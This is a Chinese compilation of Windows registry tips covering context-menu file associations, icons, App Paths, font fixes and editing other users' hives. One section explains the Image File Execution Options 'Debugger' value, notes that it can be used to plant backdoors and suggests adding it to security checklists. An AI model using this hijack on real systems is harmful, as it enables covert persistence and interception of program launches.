修改注册表后,一般要注销后重新登录,方可起作用。
注册表的文件关联及应用
喜欢使用Windows右键快捷菜单的朋友可能知道,当你选择了一个文件(或者是文件夹或是系统图标)再单击鼠标右键,系统就会弹出一个菜单,菜单上面的各种“功能”(或称“操作”)任你选择,但是你是否注意到,当你安装一些应用软件之后,你的右键菜单是不是膨胀,以winzip为例,安装winzip之后,文件或文件夹的右键菜单当中就增加了功能选择项"Add to Zip"和"Add to xxx.zip",如图一,看到这个变化,我们不禁要问,这些选择项是怎么加入的,可不可以自己来添加。带着这些问题,我们再来看Windows的文件关联。
什么是文件关联呢?通俗地说,就是选择不同类型的文件时,在其右键菜单上显示的各功能项。每个功能项即对应一个关联。选择了某一功能(操作),系统就去执行相应的处理程序。至于对什么文件的什么操作对应什么样的处理程序,那都记录在系统注册表中。因此,要真正弄清文件关联,必须深入研究注册表。这个问题解决了,我们就可以利用注册表随心所欲地为文件建立,修改,删除关联。
既然关联信息都写在注册表中,那么它在注册表中又是怎样构成的呢?我们不妨打开注册表,观察根键HKEY_CLASSES_ROOT之下的各个主键。(这样或许更易说明这一点)你是不是看到了很多前面有一个点(.),后面好象是文件扩展名的主键,如图二所示
DefaultIcon主键,它的功能是定义该类文件的默认图标。
Shell主键,它的功能是本文讨论的中心——文件关联之“命根”所在。文件的各种关联都寄生在此“根”之下,正是它定义了该类文件与多个程序相关联。它的默认值也很有用,你是否还记得双击文件可以将文件打开(对于已注册的文件),这种打开就是利用了系统注册表所设定的默认打开方式,即由shell主键的默认键值来控制。它之下的每个主键,都可称作是“关联主键”(如图四)。“关联主键”的键名是任意的(建议用英文),它的默认键值也是我们感兴趣的。因为这一默认键值会直接显示在右键菜单中,并且每个“关联主键”之下都有一个command主键,这个主键定义的就是“该关联对应的执行程序”。如图五所示,到此文件关联已昭然若揭。
下面我们就以.reg文件(注册表的脚本文件)为例来说明其关联过程。
首先.reg文件在HKEY_CLASSES_ROOT根键之下有一个“扩展名主键”。.reg其默认值为regfile,说明reg类型文件关联的主键是regfile。再在该根键之下找“标识主键”regfile,regfile主键之下有一个DfaultIcon主键,作用是定义reg文件的默认图标。其默认键就是图标的全路径文件名。如: C:\windows\regedit.exe,1(表示的是regedit.exe中的第2个图标)。regfile主键之下还有一个上文称之为“命根”的主键shell,reg文件的关联就记录在shell之中。下面我们就为regt建立一个关联。步骤为:在shell主键之下,新建主键xxf(名任意),置其默认值为:“徐喜峰的文本编辑器”,再在xxf主键之下新建主键command,置其默认值为C:\Windows\Notepad.exe %1,该默认值的意义为:用记事本来打开当前reg文件。若没有%1参数,则只运行记事本程序,而不打开当前文件。设置完毕,你再看看reg文件的“右键菜单”,是不是多了一个“徐喜峰的文本编辑器”选项(如图六),爽吧!~
以上所说的只是作用于普通文件的关联,然而在Windows中,除了文件,还有文件夹及特殊的文档(如我的电脑,驱动器,回收站等)。那么这些又该如何设置关联呢?那就请大家记住在HKEY_CLASSES_ROOT根键之下还有以下几个重要的系统关联主键:
*:作用于所有文件,它与“标识主键”的关联方法一样。
Directory:作用于一般文件夹。
Folder:作用于所有文件夹,包括特殊文件,如:控制面板,回收站等。
Drive:作用于驱动器,如A驱,B驱,C驱。
Unknow:作用于系统不能识别的文件类型,即没有注册的文件类型。
最基本的文件关联就谈到此处,下面来看看文件关联的应用。
应用之一:让MS-DOS方式无处不在。
经常用到DOS方式的朋友可能有些厌烦,因为每次进入DOS方式,都要选择“开始\程序\MS-DOS方式”。利用文件关联,我们可以将MS-DOS方式添加到任何文件的“右键菜单”中,这样就省事多了,方法为:
将注册表展开到HKEY_CLASSES_ROOT\*\shell分支。(在所有文件的“右键菜单”中添加MS-DOS方式)新建主键“MS-DOS",置其默认值为“进入MS-DOS方式”,在MS-DOS主键之下新建command主键,置其默认值为:“C:\Windows\command.com”。
另注册表展开到HKEY_CLASSES_ROOT\Folder\shell分支,(在所有文件夹的“右键菜单”中添加MS-DOS方式)设置同上。
应用之二:隐去快捷方式图标中的小箭头。
如果你觉得快捷方式图标中的小箭头有点障眼,那么利用关联,可以将之去掉,将注册表展开到HKEY_CLASSES_ROOT\lnkfile分支,将lnkfile主键之下的键值Isshortcut删除,再将注册表展开到HKEY_CLASSES_ROOT\piffile分支,将piffile主键之下的键值Isshortcut删除,即大功告成。
应用之三:用记事本来编辑bat文件。
有时想编辑bat文件,而习惯性地双击它,这一双击,并没有将它打开编辑,而是将它执行,让人甚为恼火。利用注册表的文件关联,可以将之改变。将注册表展开到HKEY_CLASSES_ROOT\batfile\shell分支,将shell主键的默认值由open改为edit即可。
应用之四:更改某类文件的默认图标。
以txt文件为例,将txt文件的图标改为“我的电脑”的图标。将注册表展开到HKEY_CLASSES_ROOT\txtfile\DefaultIcon分支,将主键DefautIcon的默认键值改为:"C:\Windows\explorer.exe,0" 即可。
应用之五:为所有文件增加“打开方式”。
将注册表展开到HKEY_CLASSES_ROOT\*\shell分支,新建主键open_as,置其默认值为“选择打开方式”,在Open_As主键之下新建主键command,置其默认值为:"C:Windows\rundll32.exe shell32.dll , openAs_RunDll %1"
应用之六:将“关机”加入到右键菜单。
将注册表展开到HEKY_CLASSES_ROOT\Directory\shell分支,新建主键close,置其默认值为“关闭系统”,再在close主键之下,新建主键command,置其默认值为:"C:\Windows\rundll32.exe user.exe, exitwindows"
以上六例应用,总体上能够概述文件关联的基本结构和基本框架,弄清了文件关联的结构与框架,自己再增加关联就是小菜一碟了。只要你有兴趣,你可以将你的右键菜单加得满满的。如果你想了解更深一层次的文件关联,那就请你参阅有关windows注册表方面的书籍与资料,或与我联系,我的Email是
amen.twty@china.net。在文章结束之前,还告诉大家一点小小的诀窍:那就是注册表在作过修改之后,很多场合需要重新启动才能生效。这里我告诉大家一个不需要重启但又能快速更改注册表的方法:选择“开始\关闭系统”,在弹出“关闭系统”框之后,按Ctrl+Alt+Del 组合键,出现“结束任务”框,选择其中的“Explorer”,再单击“结束任务”,等待一会儿(10秒左右),就会出现一个“结束任务”确认框,点击“结束任务”按钮即可
对一个注册表项的粗略分析
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
注册表的这个项大家可能还不太熟悉,因为这个主要是用来调试程序用的,对一般用户
意义不大。默认是只有管理员和local system有权读写,一般user只读。
先做个实验:在这个项下新建一个子项“test.exe”,再建一个字串值“Debugger”,
数值数据设为“cmd.exe /c echo”,随便把一个EXE文件改名为“test.exe”,然后在命令
行调用“test.exe”,得到的屏幕输出不是test.exe的输出,而会是这样:
E:\>test
test
E:\>test.exe
test.exe
Windows NT系统在执行一个从命令行调用的可执行文件运行请求时,首先会检查这是否
是一个可执行文件,如果是,又是什么格式的,然后就会检查是否存在:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ImageName]
如果存在,首先会试图读取这个键值:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ImageName]
"Debugger"="debug_prog"
如果存在,就执行“debug_prog ImageName”,刚才的例子中,其实系统真正执行的是:
cmd.exe /c echo test
cmd.exe /c echo test.exe
如果“debug_prog”设为一个不在搜索路径中的程序,会得到一个很有趣的提示:“系
统找不到文件 E:\test.exe”。而事实上test.exe就在当前目录下,这里所谓找不到的其实
是那个“debug_prog”。而只要设置了test.exe这个项,既使test.exe不存在,也不会提示
“系统找不到文件”,控制台上不会返回任何输出。
系统在运行任何一个可执行程序时都会先检查这个键值。这个特性可以被用来放置后门。
这一点,在以往的Windows 安全资料中尚未提到过。如果你有一个Windows 2000安全检查列
表,请把它加进去。
这个项支持的值,在Windows 2000下我找到的有:
ApplicationGoo
Debugger
PageHeapFlags
DisableHeapLookAside
DebugProcessHeapOnly
PageHeapSizeRangeStart
PageHeapSizeRangeEnd
PageHeapRandomProbability
PageHeapDllRangeStart
PageHeapDllRangeEnd
GlobalFlag
BreakOnDllLoad
这些项的工作都只与文件名有关,与路径无关。
其中,Debugger上面讲过了。DisableHeapLookAside可以用来纠正一些应用程序运行时
的问题。从Windows NT SP4开始,Windows 系统使用了新的堆(heap)管理机制,新的动态
内存分配使得应用程序占用更少的内存(也使写Exploit更加困难:-)),但是也有些应用程
序在这种机制下无法正常运行,会挂起或出错。这种情况下,以该文件名建一个项,并把
DisableHeapLookAside 设为“1”,会强迫系统对此应用程序不使用新的堆管理机制。(基
于一般系统的堆溢出 Exploit,在应用程序改变了运行方式后是不是会失效?那么,对关键
程序使用这一手段,在某种意义上,也是一种抵御溢出攻击的方法。)
关于DisableHeapLookAside更多的信息请参考微软知识库:Q252902,Q195008,Q195009。
有趣的是,Windows 2000在安装的时候,就预设了这几个文件名的DisableHeapLookAside:
enc98.EXE
f32main.exe
prwin8.EXE
ps80.EXE
qfinder.EXE
qpw.EXE
ua80.EXE
wpwin8.EXE
大概是微软收到了有关这些应用程序运行异常的报告吧:-)。
BreakOnDllLoad 是用来调试DLL的,譬如某个ISAPI。可以在DLL刚一装入就设置断点。
可以参考Rick Strahl的《Debugging IIS5 ISAPI Applications with VC++》
ApplicationGoo我没有找到相关资料,但从微软预设的值来看,这个项里存放的是文件
的版本信息。我猜想是否用这个来匹配特定版本的文件。
剩下来的这几个值虽然我知道它们是确实存在的,却无法找到任何有关的资料,甚至在
MSDN里也只字未提,还好它们的名称基本上已经把用处说清楚了:-),都是用来控制heap 的。
希望这几个值对正在埋头研究Windows堆溢出的朋友们能有一点点帮助。
附加信息:
在XP中,这个项下面还支持ShutdownFlags这个值。下面是微软的描述:
Leak Detection when the Process Is Exiting
Leak detection is made every time a process is cleanly exiting.
It doesn't work if the process is terminated with TerminateProcess()
or TerminateThread() / ExitThread() for the last thread in the process;
but for most applications this is not a problem.
To enable leak detection when the process is exiting, set the registry key as follows:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ImageName]
"ShutdownFlags"="3"
EditFlags的含义
在通过【文件夹选项—文件类型】修改文件关联时,有时会遇到这种情况,既对某些文件无法编辑,如无扩展名的“资料夹”。其实这是“微软”为防止普通用户在“文件类型”中无意更改重要文件关联,而设置的保护措施。
在注册表中HKEY_CLASSES_ROOT下,如“htmlfile”键,在其下新建一名为“EditFlags”的“DWORD”键(如果没有的话),修改参数的功能如下:
<高级里无编辑无删除可更改图标>
EditFlags DWORD 0x000001d2
<高级里无编辑无删除无更改图标>
EditFlags DWORD 0x000003d2
<该文件类型隐藏>
EditFlags DWORD 0x00000001
<该文件类型显示>
EditFlags DWORD 0x00000002
<无高级>
EditFlags DWORD 0x00000008
<高级里无编辑>
EditFlags DWORD 0x00000040
<高级里无删除>
EditFlags DWORD 0x00000080
<高级里无更改图标>
EditFlags DWORD 0x00000200
<高级里取消“下载后确定打开”的勾>
EditFlags DWORD 0x00010000
详解右键关联菜单
[HKEY_CLASSES_ROOT\*]
注册表中这个键位,它是关联着系统所有文件的
[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers]
这个键则是对应它的关联右键菜单,在这个键下面添加项目及操作,就是给所有文件添加菜单。在这个键的下面默认有个[Open With]键,这是关联菜单中的“打开方式”;一般安装了常用软件Winrar,那么就会多出一个[WinRAR]的键来。
[HKEY_CLASSES_ROOT\AllFilesystemObjects]
这个键也是关联所有文件的
[HKEY_CLASSES_ROOT\AllFilesystemObjects\shellex\ContextMenuHandlers]
这个键下面默认有个[Send To]键,它就是菜单项目“发送到”。
[HKEY_CLASSES_ROOT\Directory]
这个键位,它的默认值数据为‘文件夹’,这样说明,它是关联着系统的所有文件夹,而且在‘文件夹选项’的‘文件类型’中,也可以看到它以及编辑关联菜单等。
[HKEY_CLASSES_ROOT\Directory\Background\shellex\ContextMenuHandlers]
这个键,是对应每个文件夹的背景右键菜单,所以在这个键下面添加项目及操作,就等于给‘桌面’和‘文件夹空白处’增加了菜单。它不可以在‘文件类型’中编辑和修改,甚至优化大师等优化软件也不能编辑它。
[HKEY_CLASSES_ROOT\Directory\shell]
这个键,是对应右键单击每个文件夹上的菜单,如果在这个键下面添加项目和修改,就修改了文件夹的右键菜单了。‘文件类型’和大多优化软件可以编辑和修改到它。
[HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers]
这个键,也是对应右键单击每个文件夹上的菜单,如果在这个键下面添加项目和修改,就修改了文件夹的右键菜单了。大多优化软件可以编辑和修改到它,但‘文件类型’中无法编辑它。
[HKEY_CLASSES_ROOT\Drive]
这个键位,它的默认值数据为‘驱动器’,这样说明,它是关联着系统的所有硬盘分区的,而且在‘文件夹选项’的‘文件类型’中,也可以看到它以及编辑关联菜单等。
[HKEY_CLASSES_ROOT\Drive\shell]
这个键,是对应右键单击每个分区上的菜单,如果在这个键下面添加项目和修改,就修改了分区的右键菜单了。‘文件类型’和大多优化软件可以编辑和修改到它。不过默认只有一项“搜索”的菜单,还有就是XP系统在文件夹选项改动这一项时,会导致“搜索”被变为默认菜单,而“打开”却变为次菜单。
[HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers]
这个键,也是对应右键单击每个分区上的菜单,如果在这个键下面添加项目和修改,就修改了分区的右键菜单了。大多优化软件可以编辑和修改到它,但‘文件类型’中无法编辑它。
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts]
如果想要删除某一文件类型打开方式列表中的某一条目,在这个键下找对应的<.扩展名>\OpenWithList把不需要的项目删除,
示例:
如果想删除文本文档(*.txt)的Windows记事本(notepad.exe)打开方式,应该删除下列键值:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.txt\OpenWithList中值为notepad.exe的字符串值。
自定义“运行”命令
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
怎样自定义呢?
这个项下,有很多exe后缀的项目,而且每个项目有默认值数据和Path值,它们的概意分别为“程序目标”、“目标位置”。而这些程序名,都可以在“开始”菜单→“运行”里输入并启动。
从这个项,我们马上能想到,可以在App Paths下添加自定义项目,比如我C盘的Program Files文件夹里有个test.exe文件,那就在App Paths项目下添加一个名为test.exe的项,其实项名不一定要跟程序文件名一样,可以改得更简单,例如名为1.exe,新建项后,在其右边修改“默认值”和“Path”值的数据。确定无误后,关闭注册表编辑器,在“运行”(快捷键Win+R)里键入test.exe命令(扩展名可不输),这样就快速的打开了该程序,如果当初新建的项名为1.exe,则输入1即可。
特别例子:
在XP系统中,有个“系统配置实用程序”,文件名为msconfig.exe,程序位置是X:\Windows\PCHealth\HelpCtr\Binaries\MSConfig.exe,并且被列入App Paths的行列中,如果这个msconfig.exe项的默认值数据被改的,那在“运行”中输入msconfig就会出现系统提示说“找不到。。。”,如果有朋友出现上叙情况,那可能就是注册表被修改造成的。
揭开失踪的IE进程之谜
引用:无意中发现,我的进程列表中没有IE,即便我打开N个页面,进程列表中就是没有熟悉的iexplore
查过病毒,系统是安全的
查过木马,没有
以为是快捷方式指向了EXPLOERE,直接到C盘的PROGRAME文件夹启动IE,仍然找不到iexplore进程,奇怪了
无意中发现,进程列表中的explorer内存占用高达57M
一般情况下,EXPLORE这个进程占用内存在十几兆是正常的,可是,57M,不可思议
于是做了一个测试,把EXPLORER杀死,然后再启动一个EXPLORER,发现,内存耗用正常
再打开几个网页,发现,随着网页数量的增加,EXPLORE内存耗用逐步攀升
难度是EXPLORER和IEXPLORE这两个孪生兄弟弄串了??不可能呀
没办法,只好用ACRONIS TRUIMAGE把以前备份的镜像还原过来
费了一个小时还原(有9G呢)完了,开机,打开网页一看,仍然见不到IEXPLORE进程
天啊!见鬼了!
我也不是菜鸟呀?竟然有如此怪事!
到GOOGLE上搜了一下,没有关于此现象的任何消息,郁闷,改天格了重装吧,看来,这是唯一的解决方法了
梦何:最近我也遇到这样的问题,但我在研究中发现,其实不是IEXPLORE进程不见了,只是它跟explorer进程合并了。我在“运行”中如输入iexplore.exe
http://www.163.com,可以打开网站,并进程出现一个IEXPLORE,但是我在任务管理器的“应用程序”,右击那个“任务”选择“转到进程”,它还是跳转指向了explorer进程上;我又实验了一遍,先打开任务管理器,让它处于显示“进程表”状态,然后我打开IE浏览器,观察进程出现IEXPLORE了,但不到1秒就消失了。从这里分析,我认为IEXPLORE进程是存在的,它消失是可能与explorer进程合并了。
经过一番研究,原来可以修改注册表,来让IEXPLORE和explorerl两个进程之间进行合并或独立。
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
如果在这个项中,新建一串值 也命名为BrowseNewProcess
数据:yes(表示资源浏览器窗口和IE浏览器窗口使用单独的进程
no(表示资源浏览器窗口和IE浏览器窗口使用同一进程explorer.exe
修改后退出注册表编辑器生效。
消除应用软件的乱码显示
在注册表中通过应用软件的设置,不仅可以提高应用水平,还可以解决一些疑难问题。
●消除应用软件的乱码显示:
在注册表中打开HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FontAssoc\Associated Charset子键分支,将右边窗口内的“SYMBOL(02)”(这是Windows XP系统的机内码)的数值改为“NO”即可。
●在应用软件中设定字体替换:
使用字处理应用软件时常会碰到这样的情况,当把一台计算机上编辑好的文件拿到其他计算机上打开时,原来的字体发生了变化。原因是两台计算机上所装的字体不同,系统用已按装的字体替换了文件中本机上没有安装的字体。如果指定的替换字体是和原来字体不相似的字体,就会出现文字的混乱,出现不可辨认的字。为了避免这些问题,可以由注册表来进行这种替换。打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes子键分支,可以看到在右边的窗口中有些键值项的键值名是一种字体名,而数值是另一种字体名。则表示当系统中出现键值项名的字体时使用数值中的字体进行替换。如果您想更改替换的字体,双击该键值项,在弹出的对话框中将数值改为您希望的字体名。不过注意,用来替换的字体必须是“控制面板”中“字体”中存在的字体,并且字体名字符串中间的空格必须正确。
●加入可运行的程序后缀:
在Windows XP系统中,后缀为.com、.exe、.bat、.pif、.cmd的程序都可以运行。如果要添加其他可运行的程序后缀,如.cgj,则在注册表编辑器中打开HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows子键分支,在右边的窗口中Programs键值项数据后面加上“cgj”即可。
●应用软件中长短文件名转换问题:
Windows XP中支持长文件名,为文件起名不必再受DOS的格式限制。但是在Windows XP中的DOS窗口下使用DIR命令查看文件名时,但文件名超过8个字符时会被自动截取前面的部分并在后面加上一个“~”和一个数字。这是为了和DOS兼容,Windows XP为长文件名自动生成的8.3格式短文件名。这种生成的方法可以通过修改注册表来改变,使得生成的短文件名尽可能和原文件名保持一致,打开HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem子键分支,在右边的窗口中新建一个二进制的键值项数据“NameNumericTail”,将其值改为00 。重启后Windows XP的DOS窗口下显示的文件名就会尽可能接近长文件名,易于区别又绝不相同。
●改变字体关联:
在Windows XP中偶尔会碰到应用软件字体不能正常显示的问题。出现这种情况有可能是Windows XP中应用软件的字体关联有误。如果字体已经正常安装,可能就是注册表中的字体关联出错。打开HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro\lFontAssoc子键分支,该子键下应该有三个子键,Associated CharSet、Associated DefaultFonts和Associated Fonts。如果汉字软件出现乱码,通常是Associated DefaultFonts子键下的内容不完整,这里是该子键下的所有键值名和值。
其中的“新宋体”处也可以是“宋体”。另外,在Associated CharSet中指定了一些字符集的应用与否。键值名为字符集的名字,值可以为“yes”或“no”。如果英文软件在中文Windows XP下出现乱码。可以尝试把GB2312(86)的值改为“no”,重启生效。
不登录编辑其他用户配置信息
注册表中的根键[HKEY_CURRENT_USER]中保存了当前登录用户的用户信息,一般在此键下修改与当前用户相关的配置信息。如果想在注册表中修改其他用户的配置信息,就必须先要用相应用户账户登录,然后再到注册表根键[HKEY_CURRENT_USER]下修改。如果要修改多个用户的配置信息,每修改一个,就要登录一次,这就显得很繁琐。那有没有在当前用户下修改多个其他用户配置信息的办法呢?有!下面我就给大家介绍一下具体的修改方法。详细步骤如下:
第一步:首先,以具有管理员权限的用户账户登录,然后打开注册表编辑器,选中根键[HKEY_USERS]。单击“文件”菜单,选择“加载配置单元”。
第二步:在“打开文件”对话框中,定位到“X:\Documents and Settings”目录下。其中,X代表操作系统所在分区的盘符,username代表要修改的账户的用户名。
第三步:选择NTUSER.DAT文件,并点击“打开”按钮。在弹出的对话框中输入一个“项目名”,比如可以用要修改的账户的用户名作为项目名。
第四步:这时,在根键[HKEY_USERS]下会生成了一个以刚才输入的项目名命名的子键。现在,就可以在这个子键下做相应修改。
第五步:修改完毕,选中刚才生成的子键,选择“文件”菜单中的“卸载配置单元”命令将其卸载。
注意:在用修改的账户登录前,必须卸载掉已经加载的子键,否则在加载用户配置文件时将出错。此方法适用Windows XP。
转自:3721
